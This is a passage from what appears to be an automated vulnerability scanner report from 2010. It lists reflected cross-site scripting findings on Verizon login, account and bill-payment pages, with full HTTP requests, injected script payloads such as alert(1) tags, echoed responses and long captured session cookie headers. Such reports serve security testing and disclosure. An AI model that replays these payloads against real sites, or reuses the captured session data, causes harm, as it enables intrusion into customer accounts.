WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22604
Expires: Sat, 20 Nov 2010 02:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:26 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=TiFI0EpTTVOnzjDD4KXHGQ%3d%3d; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...

//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "NB-NS89a05
alert(1)//cc561db1e96
";
FlowRoute = ("NB-NS89a05
alert(1)//cc561db1e96");


               locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + Flo
...[SNIP]...

3.119. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/MyAccount/Protected/Services/MyServices.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37328"%3b82d1bb06d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37328";82d1bb06d82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328"%3b82d1bb06d82=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 129022

<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328";82d1bb06d82=1';
<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->
...[SNIP]...

3.120. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71f4e"%3b9ffd29efbfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71f4e";9ffd29efbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e"%3b9ffd29efbfb=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:46:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCQADSRDB=JFJJPGMCOIBMGHBLMKJGGKJD; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660;path=/
Content-Length: 129039

<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
trMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e";9ffd29efbfb=1';
<!-- Vignette V6 Fri Nov 19 18:46:12 2010 -->
...[SNIP]...

3.121. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [UIDPWD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the UIDPWD request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ab8"><script>alert(1)</script>0ab8ac65924 was submitted in the UIDPWD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA22V
Content-Type: text/html; charset=utf-8
Content-Length: 47366
Expires: Sat, 20 Nov 2010 02:33:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:55 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&UIDPWD=Invalid31ab8"><script>alert(1)</script>0ab8ac65924&WTNOnly=Y" name="target">
...[SNIP]...

3.122. https://www22.verizon.com/ForyourHome/Registration/Reg/ORLogin.aspx [WTNOnly parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/ORLogin.aspx

Issue detail

The value of the WTNOnly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eb64"><script>alert(1)</script>4317d0b7492 was submitted in the WTNOnly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/ORLogin.aspx?UIDPWD=Invalid&WTNOnly=Y3eb64"><script>alert(1)</script>4317d0b7492 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
